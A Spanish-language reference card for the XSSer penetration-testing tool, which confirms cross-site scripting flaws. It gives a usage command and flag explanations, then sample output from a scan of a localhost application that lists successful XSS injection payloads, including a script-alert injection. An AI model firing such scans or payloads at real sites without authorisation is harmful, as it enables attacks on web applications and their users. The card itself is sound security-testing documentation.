XSSer
Fase(s):
Principal: Explotación.
Secundaria: N/A.
Descripción:
Es una herramienta que ayuda a confirmar una vulnerabilidad Cross Site Script.
Objetivo:
- Confirmar vulnerabilidades Cross Site Script en una aplicación Web.
- Obtener el payload que explota la vulnerabilidad Cross Site Script.
Funcionalidades:
Tecnologías soportadas: Aplicaciones Web (HTTP/HTTPS).
Modo de ejecución: Activo.
Confirmar vulnerabilidades Cross Site Script.
- Envía varios request HTTP con payload e informa si la prueba fue satisfactoria o no lo fue.
Reportes:
Resultados exportables: ✔
Guarda los resultados en las siguientes formas:
- Archivo en formato de texto plano.
- En un reporte en formato XML, guarda un reporte por cada ejecución.
Uso básico:
Realizar la verificación de vulnerabilidades Cross Site Script. El siguiente comando envía un request HTTP con payload al aplicativo Web para confirmar la vulnerabilidad Cross Site Script.
./xsser -u [URL] -g ?txt002=asd&txt003=" --auto --save --xml=[Directorio]/reporteXmlXSSer.xml
Dónde:
- -u. Es la página donde se identificó la vulnerabilidad Cross Site Script
- -g. Los parámetros necesarios para realizar la petición HTTP, el parámetro vulnerable deberá ser el último seguido del signo ‘=’.
- --auto. Prueba payloads autogenerados por la herramienta.
- --save. Guarda el resultado de la prueba en el archivo, por defecto “XSSlist.dat”
- --xml. Guarda el reporte de la prueba en un archivo con formato XML.
La herramienta inicia con una prueba con la que verifica la disponibilidad del aplicativo.
===========================================================================
XSSer v1.6 (beta): "Grey Swarm!" - 2011/2012 - (GPLv3.0) -> by psy
===========================================================================
Testing [XSS from URL] injections... looks like your target is good defined ;)
===========================================================================
HEAD alive check for the target:
(http://localhost/miaplicacion/viewTxtSecond.php) is OK(200) [AIMED]
===========================================================================
Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
===========================================================================
Posteriormente, se muestran mensajes de estatus de la ejecución de la prueba, donde se indica el resultado de cada prueba realizada.
…
---------------------------------------------
[-] Hashing: 17b639ff5ed74979be28767fac3a3ccc
[+] Trying: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003=">17b639ff5ed74979be28767fac3a3ccc
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[+] Checking: url attack with ">PAYLOAD... ok
===========================================================================
Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
===========================================================================
---------------------------------------------
[-] Hashing: 23f90e9384b1b1d14fac2219f4852b5a
[+] Trying: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003=">
[+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
[+] Checking: url attack with ">
... fail
===========================================================================
Target: http://localhost/miaplicacion/viewTxtSecond.php --> 2013-10-24 15:28:52.029448
…
Por último, muestra estadísticas acerca de las pruebas realizadas y la lista de las pruebas satisfactorias.
===========================================================================
Mosquito(s) landed!
===========================================================================
[*] Final Results:
===========================================================================
- Injections: 98
- Failed: 83
- Sucessfull: 15
- Accur: 15 %
===========================================================================
[*] List of possible XSS injections:
===========================================================================
[I] Target: http://localhost/miaplicacion/viewTxtSecond.php
[+] Injection: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003="><script>alert('54cb1f93151d601c24d761ecdf9b5
692')</script>
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
--------------------------------------------------
[I] Target: http://localhost/miaplicacion/viewTxtSecond.php
[+] Injection: http://localhost/miaplicacion/viewTxtSecond.php?txt002=asd&txt003='';!--"<63fc790dd14eec89b6eec7dca56230b1>=&{()}"
[-] Method: xss
[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
--------------------------------------------------
…
Ejemplo de reporte XML:
<report>
<header>
<title>XSSer Security Report: AAA-MM-DD hh:mm:ss.xxxx</title>
</header>
<abstract>
<injections>
<total>TOTAL</total>
<failed>FAILED</failed>
<successful>SUCCESSSFUL</successful>
<accur>%</accur>
</injections>
</abstract>
<results>
<attack>
<injection>URL_WITH_INJECTION</injection>
<browsers>BROWSER_SUPPORT</browsers>
<method>METHOD</method>
</attack>
…
</results>
</report>
Referencias:
Liga: http://xsser.sourceforge.net/
Autor (es): psy (epsylon)
Contacto: root [at] lordepsylon.net
Licencia: GNU GENERAL PUBLIC LICENSE